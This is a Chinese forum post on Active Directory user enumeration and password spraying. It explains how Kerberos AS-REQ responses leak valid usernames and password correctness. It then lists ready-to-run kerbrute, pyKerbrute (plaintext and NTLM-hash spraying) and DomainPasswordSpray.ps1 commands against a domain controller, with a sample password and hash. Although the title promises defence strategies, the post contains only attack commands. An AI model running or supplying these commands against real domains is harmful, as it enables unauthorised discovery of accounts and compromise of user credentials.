域内用户枚举与密码喷洒攻击:防范与应对策略

一、背景介绍

在 Kerberos 协议认证的 AS-REQ 阶段,当用户不存在时,返回包提示错误;当用户名存在时,密码正确和密码错误时,AS-REP 的返回包不一样。利用这一点,可以进行域内用户枚举和密码喷洒攻击。

二、域内用户枚举

kerbrute

GitHub: https://github.com/ropnop/kerbrute/releases

下载地址:https://github.com/ropnop/kerbrute/releases

使用示例:

<code>.\kerbrute_windows_amd64.exe userenum --dc 192.168.30.12 -d test.com .\user.txt</code>
图片[1]-域内用户枚举与密码喷洒攻击:防范与应对策略-山海云端论坛

pyKerbrute

GitHub: https://github.com/3gstudent/pyKerbrute

下载地址:https://github.com/3gstudent/pyKerbrute

使用示例:

<code>python2 EnumADUser.py 192.168.30.12 test.com user.txt udp 或 python2 EnumADUser.py 192.168.30.12 test.com user.txt tcp</code>
图片[2]-域内用户枚举与密码喷洒攻击:防范与应对策略-山海云端论坛

三、密码喷洒攻击

kerbrute

<code>.\kerbrute_windows_amd64.exe passwordspray --dc 192.168.30.12 -d test.com .\user.txt passw12#</code>

pyKerbrute

明文密码喷洒

<code>python2 ADPwdSpray.py 192.168.30.12 test.com user.txt clearpassword passw12# tcp</code>

哈希密码喷洒

<code>python2 ADPwdSpray.py 192.168.30.12 test.com user.txt ntlmhash F6502CBE4802F94AB472288970C124CD udp</code>

DomainPasswordSpray.ps1

GitHub: https://github.com/dafthack/DomainPasswordSpray

下载地址:https://github.com/dafthack/DomainPasswordSpray

使用示例:

mathematica

<code>Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -Password 密码</code>
图片[3]-域内用户枚举与密码喷洒攻击:防范与应对策略-山海云端论坛
© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容